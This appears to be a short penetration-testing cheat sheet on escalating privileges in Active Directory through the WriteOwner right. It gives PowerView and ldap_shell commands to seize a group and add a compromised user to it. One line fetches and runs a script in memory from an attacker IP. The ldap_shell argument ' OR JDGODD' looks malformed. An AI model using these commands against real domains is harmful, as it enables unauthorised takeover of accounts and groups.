# WriteOwner Assuming a user has `WriteOwner` on a group. We can take control of the group and then we can add ourselves or any other user we compromised, into that group. We start by looking at the bloodhound graph.\ For this, we have a user called `JDGODD`, he has WriteOwner on a group called `Core Staff`, we can take control of the group, using PowerView. ![WriteOwner Permission in Bloodhound](https://3517022440-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7AiL05qubQhf0RoEOXWw%2Fuploads%2FMUxzJOlZRutsygfmpw5m%2Fimage.png?alt=media\&token=d4879a88-ceb2-4326-a54b-1f60e4f2d4e2) We start by importing PowerView. We can execute in memory by using `IEX.` ```powershell iex(new-object net.webclient).downloadstring('http://10.10.xxpowers.xx/PowerView.ps1') ``` Then we use JDGOOD's password and store the password in a variable called `Creds` ```powershell $SecPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\JDgodd', $SecPassword) ``` Now we chnage the OwnerIdentity and PrincipalIdentity of the group. ```powershell Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All ``` After all, we add the user into the group. ```powershell Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred ``` To verify => `net group 'CORE STAFF'` ### Alternative Method We can use `Ldap` to do this, for this we use a tool called [ldap\_shell](https://github.com/PShlyundin/ldap_shell) ```bash ldap_shell domain.local/JDgodd:Password1 -dc-ip 10.10.xx.xx ``` After getting an interactive session, we can execute two commands that give us the important writes. ```bash set_genericall "CORE STAFF" "JDGODD" add_user_to_group " OR JDGODD" "CORE STAFF" ```